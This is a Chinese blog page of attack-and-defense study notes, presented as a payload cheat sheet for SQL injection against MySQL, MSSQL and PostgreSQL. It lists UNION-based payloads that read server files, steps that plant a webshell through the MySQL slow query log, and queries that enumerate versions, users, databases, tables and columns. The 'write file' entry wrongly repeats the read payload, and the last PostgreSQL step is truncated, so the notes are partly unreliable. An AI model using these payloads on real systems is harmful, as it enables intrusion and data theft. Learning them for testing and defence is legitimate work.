当前位置: 首页 > article >正文

网络安全之攻防笔记--通用漏洞SQL注入之MySQLmssqlpostgresql

  • 通用漏洞SQL注入之mysql&h&mssql&postgresql
    • mysql数据库
      • root高权限读写注入
        • 读取文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 写入文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 路径获取
          • phpinfo,报错,字典等
        • 无法写入
          • secure_file_priv 突破 注入中需要支持 SQL 执行环境,没有就需要借助 phpmyadmin 或能够直接连上对方数据库进行绕过
          • set global slow_query_log=1
          • set global slow_query_log_file='shell 路径';
          • select '' or SLEEP(1);
    • mssql数据库
      • 高权限读写注入
        • 可以执行系统命令、读写文件操作
        • 测列数
          • ORDER BY 4
          • AND 1=2 UNION SELECT NULL,NULL,NULL,NULL
        • 测显位
          • AND 1=2 UNION SELECT NULL,'NULL',NULL,NULL
        • 获取信息
          • AND 1=2 UNION SELECT NULL,@@VERSION,NULL,NULL
          • AND 1=2 UNION SELECT NULL,SUSER_NAME(),NULL,NULL
          • AND 1=2 UNION SELECT NULL,DB_NAME(),NULL,NULL
        • 获取数据库名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM master..sysdatabases
        • 获取表名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM sysobjects WHERE xtype='U'
        • 获取数据
          • AND 1=2 UNION SELECT NULL,column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'
    • postgresql数据库
      • 高权限读写注入
        • 测列数
          • order by 4
          • and 1=2 union select null,null,null,null
        • 测显位:第2,3
          • and 1=2 union select 'null',null,null,null 错误
          • and 1=2 union select null,'null',null,null 正常
          • and 1=2 union select null,null,'null',null 正常
          • and 1=2 union select null,null,null,'null' 错误
        • 获取信息
          • and 1=2 UNION SELECT null,version(),null,null
          • and 1=2 UNION SELECT null,current_user,null,null
          • and 1=2 union select null,current_database(),null,null
        • 获取数据库名:
          • and 1=2 union select null,string_agg(datname,','),null,null from pg_database
        • 获取表名
          • 1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
          • 2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
        • 获取数据
          • and 1=2 union select
    • 另外
      • access无高权限注入点--只能猜解,还是暴力猜解
      • MySQL,postgresql,mssql高权限注入点-可升级读写执行

http://www.kler.cn/a/550611.html

相关文章:

  • 网络工程师 (44)ARP协议
  • 【Pandas】pandas Series idxmax
  • c/c++蓝桥杯经典编程题100道(19)汉诺塔问题
  • io流简单的读写
  • 嵌入式 Linux 设备驱动:自动创建设备节点详解
  • CNAPPgoat:一款针对云环境的安全实践靶场
  • Linux-C/C++《C/8、系统信息与系统资源》
  • elementUI rules 判断 el-cascader控件修改值未生效
  • C++函数指针与回调函数详解:从青铜到王者,一文搞懂`std::function`的降维打击!
  • vtkCamera类的Dolly函数作用及相机拉近拉远
  • sass报错:[sass] Undefined variable. @import升级@use语法注意事项
  • s1K 数据集:是一个用于提升语言模型推理能力的高质量数据集。包含 1,000 个问题,每个问题都配有详细的 推理路径 和 答案。
  • Lua脚本核心语法介绍
  • 图解卷积神经网络(CNN)
  • stm32高级TIM的常用功能
  • 期权隐含波动率是什么意思?
  • 构建了一个 Linux 发行版,基于Debian和WattOS的
  • Node.js 异步并发控制:`p-map` 和 `p-limit` 的使用与对比
  • Day4 25/2/17 MON
  • 阅读论文笔记《Efficient Estimation of Word Representations in Vector Space》